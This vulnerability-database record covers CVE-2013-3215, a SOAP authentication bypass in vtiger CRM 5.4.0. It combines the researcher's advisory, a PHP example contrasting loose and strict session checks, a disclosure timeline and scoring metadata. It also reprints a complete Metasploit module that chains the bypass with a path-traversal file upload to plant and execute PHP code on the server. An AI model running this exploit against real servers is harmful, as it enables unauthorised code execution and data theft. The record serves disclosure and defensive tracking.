var-202001-0887
Vulnerability from variot
vtiger CRM 5.4.0 and earlier contain an authentication bypass vulnerability due to improper authentication validation in the validateSession function. Information may be obtained or falsified, and a denial of service (DoS) may result. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Vtiger CRM is a customer relationship management (CRM) system based on SugarCRM, developed by the American company Vtiger. It provides functions such as management, collection, and analysis of customer information.
[-] Vulnerability Description:
The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services:
```php
function validateSession($username, $sessionid)
{
    global $adb,$current_user;
    $adb->println("Inside function validateSession($username, $sessionid)");
    require_once("modules/Users/Users.php");
    $seed_user = new Users();
    $id = $seed_user->retrieve_user_id($username);

    $server_sessionid = getServerSessionId($id);

    $adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid");

    if($server_sessionid == $sessionid)
    {
        $adb->println("Session id match. Authenticated to do the current operation.");
        return true;
    }
    else
    {
        $adb->println("Session id does not match. Not authenticated to do the current operation.");
        return false;
    }
}
```
The vulnerability exists because the "sessionid" parameter isn't properly validated before being compared with the $server_sessionid variable, which is the value returned by the getServerSessionId() function. If called with an invalid session ID, this function returns "null"; in that case validateSession() returns "true" if the "sessionid" parameter is set to 0, "false", or "null". by calling a SOAP method without providing the "username" and "sessionid" parameters.
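The comparison flaw described above, shown beside a fail-closed check, as an added example that is not vtiger's code or the vendor patch. lookupUserId(), lookupServerSessionId() and the sample user and token are constructed stand-ins for Users::retrieve_user_id() and getServerSessionId().

```php
<?php
// Added example: loose (==) versus fail-closed session validation.
// All names and data below are constructed for illustration.

// Stand-in for Users::retrieve_user_id(): null when the user is unknown.
function lookupUserId($username): ?int
{
    $users = ['alice' => 7];                       // constructed sample data
    return is_string($username) && isset($users[$username]) ? $users[$username] : null;
}

// Stand-in for getServerSessionId(): null when no session exists for the id,
// which is the case the advisory describes.
function lookupServerSessionId(?int $userId): ?string
{
    $sessions = [7 => '3f9c1e5ab2d84c07'];         // constructed sample token
    return $userId !== null && isset($sessions[$userId]) ? $sessions[$userId] : null;
}

// Same decision as the advisory's validateSession(): PHP's loose comparison
// treats null as equal to null, 0, false and the empty string.
function validateSessionLoose($username, $sessionid): bool
{
    $server = lookupServerSessionId(lookupUserId($username));
    return $server == $sessionid;
}

// Hardened variant: reject anything that is not a non-empty string, reject a
// missing server-side session, then compare in constant time.
function validateSessionStrict($username, $sessionid): bool
{
    if (!is_string($username) || $username === '' ||
        !is_string($sessionid) || $sessionid === '') {
        return false;
    }
    $server = lookupServerSessionId(lookupUserId($username));
    if (!is_string($server) || $server === '') {
        return false;                              // no session can never "match"
    }
    return hash_equals($server, $sessionid);
}

// Inputs taken from the cases the advisory lists, plus a valid session and a
// wrong token for contrast.
$cases = [
    'valid session'        => ['alice', '3f9c1e5ab2d84c07'],
    'wrong token'          => ['alice', 'deadbeef'],
    'unknown user, null'   => ['nobody', null],
    'unknown user, 0'      => ['nobody', 0],
    'unknown user, false'  => ['nobody', false],
    'unknown user, empty'  => ['nobody', ''],
    'both parameters null' => [null, null],
];

foreach ($cases as $label => [$user, $session]) {
    printf(
        "%-22s loose=%-5s strict=%s\n",
        $label,
        var_export(validateSessionLoose($user, $session), true),
        var_export(validateSessionStrict($user, $session), true)
    );
}
```

Only the first case should be accepted by either function; any other row where the loose variant reports true is the bypass condition.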
[-] Solution:
Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-3215 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-08
```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description'    => %q{
        vTiger CRM allows an user to bypass authentication when requesting SOAP services.
        In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
        service. By combining both vulnerabilities an attacker can upload and execute PHP
        code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
        10.04 and Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez'   # msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space'       => 262144, # 256k
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end

  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)

    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end

    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)

    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q||

    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)

    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Upload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end

  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))

    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")

    return xml_string
  end

  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session

    xml.to_s
  end

  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method' => 'POST',
      'ctype'  => 'text/xml; charset=UTF-8',
      'data'   => soap_data
    })

    return res
  end

end
```
Record details (VAR-202001-0887)
- CVE: CVE-2013-3215
- Title (JVNDB): vtiger CRM Vulnerabilities in authentication
- Affected products: vtiger crm, version lte 5.4.0 and gte 5.1.0; versions listed individually: 5.3, 5.2.1, 5.2, 5.1, 5.0.4, 5.0.3, and crm rc 5.0.4
- CVSS v2: 7.5 (HIGH), AV:N/AC:L/Au:N/C:P/I:P/A:P (nvd@nist.gov; VULHUB VHN-63217 gives the same score)
- CVSS v3.1: 9.8 (CRITICAL), CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (nvd@nist.gov)
- CVSS v3.0: 9.8 (Critical), CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (NVD)
- Problem type: CWE-287, Incorrect authentication
- Threat type: remote (CNNVD)
- Type: authorization issue (CNNVD)
- Credits: Egidio Romano
- External IDs: NVD CVE-2013-3215; BID 61559; JVNDB JVNDB-2013-007109; CNNVD CNNVD-201308-010; PACKETSTORM 122648 and 124698; EXPLOIT-DB 27279; VULHUB VHN-63217
- Patch: Top Page, http://vtiger-crm.2324883.n4.nabble.com/ (JVNDB); Vtiger CRM validateSession() Fixes for authentication bypass vulnerability, http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=109037 (CNNVD)
- References: https://exchange.xforce.ibmcloud.com/vulnerabilities/86163; http://www.securityfocus.com/bid/61559; https://nvd.nist.gov/vuln/detail/cve-2013-3215; https://nvd.nist.gov/vuln/detail/cve-2013-3214; http://www.vtiger.com/; http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848; http://www.vtiger.com/blogs/?p=1467; http://karmainsecurity.com/kis-2013-08; https://github.com/rapid7/metasploit-framework
- Exploit availability: https://www.scap.org.cn/vuln/vhn-63217 (VULHUB, type unknown)
- Source release dates: BID 2013-08-01; CNNVD 2013-08-02; PACKETSTORM 122648 2013-08-02; PACKETSTORM 124698 2014-01-07; NVD 2020-01-29; VULHUB 2020-01-29; JVNDB 2020-02-13
- Source update dates: BID 2014-01-09; NVD 2020-01-31; VULHUB 2020-01-31; JVNDB 2020-02-13; CNNVD 2020-05-29
- Record last updated: 2024-08-14T13:25:07.543000Z